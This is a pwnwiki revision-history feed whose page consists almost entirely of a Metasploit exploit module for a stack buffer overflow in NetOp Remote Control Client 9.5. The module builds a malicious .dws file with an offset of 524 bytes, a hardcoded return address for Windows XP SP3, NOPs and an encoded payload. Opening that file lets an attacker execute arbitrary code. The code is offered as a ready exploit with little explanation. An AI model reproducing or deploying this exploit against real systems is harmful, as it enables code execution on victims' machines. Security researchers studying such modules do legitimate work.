https://pwnwiki.com/index.php?action=history&feed=atom&title=NetOp_Remote_Control_Client_9.5%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E NetOp Remote Control Client 9.5緩衝區溢出漏洞 - Revision history 2026-04-26T15:43:11Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=NetOp_Remote_Control_Client_9.5%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&diff=3275&oldid=prev Pwnwiki: Created page with "==EXP== <pre> ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web..." 2021-05-26T01:02:19Z <p>Created page with &quot;==EXP== &lt;pre&gt; ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web...&quot;</p> <p><b>New page</b></p><div>==EXP==<br /> &lt;pre&gt;<br /> ##<br /> # This file is part of the Metasploit Framework and may be subject to<br /> # redistribution and commercial restrictions. Please see the Metasploit<br /> # Framework web site for more information on licensing and terms of use.<br /> # http://metasploit.com/framework/<br /> ##<br /> <br /> require 'msf/core'<br /> <br /> class Metasploit3 &lt; Msf::Exploit::Remote<br /> Rank = NormalRanking<br /> <br /> include Msf::Exploit::FILEFORMAT<br /> <br /> def initialize(info = {})<br /> super(update_info(info,<br /> 'Name' =&gt; 'NetOp Remote Control Client 9.5 Buffer Overflow',<br /> 'Description' =&gt; %q{<br /> This module exploits a stack-based buffer overflow in NetOp Remote Control 9.5.<br /> When opening a .dws file containing a specially crafted string longer then 520<br /> characters will allow an attacker to execute arbitrary code.<br /> },<br /> 'License' =&gt; MSF_LICENSE,<br /> 'Author' =&gt;<br /> [<br /> 'Ruben Alejandro &quot;chap0&quot;',<br /> ],<br /> 'References' =&gt;<br /> [<br /> [ 'OSVDB', '72291' ],<br /> [ 'URL', 'http://www.exploit-db.com/exploits/17223/' ]<br /> ],<br /> 'DefaultOptions' =&gt;<br /> {<br /> 'ExitFunction' =&gt; 'process',<br /> 'DisablePayloadHandler' =&gt; 'true'<br /> },<br /> 'Platform' =&gt; 'win',<br /> 'Payload' =&gt;<br /> {<br /> 'Space' =&gt; 2000,<br /> 'BadChars' =&gt; &quot;\x00\x0a\x0d&quot;,<br /> 'DisableNops' =&gt; true,<br /> 'StackAdjustment' =&gt; -3500<br /> },<br /> 'Targets' =&gt;<br /> [<br /> [ 'Windows XP SP3',<br /> {<br /> 'Ret' =&gt; 0x20d6c32c, # push esp # ret - nrp.DLL<br /> 'Offset' =&gt; 524<br /> }<br /> ]<br /> ],<br /> 'Privileged' =&gt; false,<br /> 'DisclosureDate' =&gt; 'Apr 28 2011',<br /> 'DefaultTarget' =&gt; 0))<br /> <br /> register_options(<br /> [<br /> OptString.new('FILENAME', [ true, 'The file name.', 'msf.dws']),<br /> ], self.class)<br /> <br /> end<br /> <br /> def exploit<br /> buffer = rand_text(target['Offset'])<br /> buffer &lt;&lt; [target.ret].pack('V')<br /> buffer &lt;&lt; make_nops(30)<br /> buffer &lt;&lt; payload.encoded<br /> <br /> file_create(buffer)<br /> end<br /> <br /> end<br /> &lt;/pre&gt;</div> Pwnwiki